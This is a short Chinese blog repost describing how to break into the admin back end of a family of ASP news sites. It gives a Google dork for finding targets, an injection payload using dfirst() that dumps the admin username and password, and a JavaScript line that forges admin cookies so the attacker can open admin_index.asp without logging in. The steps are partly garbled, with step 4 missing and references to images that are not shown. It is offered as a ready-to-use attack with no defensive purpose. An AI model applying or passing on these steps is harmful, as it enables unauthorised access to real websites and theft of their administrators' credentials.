COOKIES欺骗通杀漏洞进后台

在谷歌里搜索：inurl:news_more.asp?lm2=

搜索到如下站点：http://www.*********/news_more.asp?lm2=169

1.将“/news_more.asp?lm2=169”替换成“/admin/admin_news_pl_view.asp?id=1”

2.将 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘贴到如下框内，修改保存。

3.

将 alert(document.cookie="adminuser=" + escape("1"));alert(document.cookie="adminpass=" + escape("2")); 代码拷贝进浏览器，回车；（注：标红1处填上图中1内容，2处填上图中2内容）

点击确定。

点击确定。

5.将地址  http://www.*********/admin/admin_news_pl_view.asp?id=1  改成  http://www.*********/admin/admin_index.asp 回车，即可不用登录直接进入后台了。如图，

转载于:https://blog.51cto.com/lopo001/1250244